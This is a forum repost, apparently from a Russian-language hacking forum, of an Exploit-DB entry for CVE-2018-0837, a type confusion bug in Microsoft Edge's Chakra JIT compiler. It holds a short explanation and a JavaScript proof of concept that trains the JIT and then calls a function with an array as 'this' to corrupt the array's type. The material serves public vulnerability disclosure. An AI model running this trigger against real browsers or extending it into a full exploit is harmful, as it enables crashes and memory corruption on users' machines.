Exploit Microsoft Edge Chakra JIT - 'LdThis' Type Confusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
44081
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2018-0837
Дата публикации
2018-02-15
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Код:
/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.

PoC:
*/

function opt(arr) {
    arr[0] = 1.1;
    this[0] = {};
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        opt.call({}, arr);
    }

    opt.call(arr, arr);
    print(arr);
}

main();
 
Источник
www.exploit-db.com

Похожие темы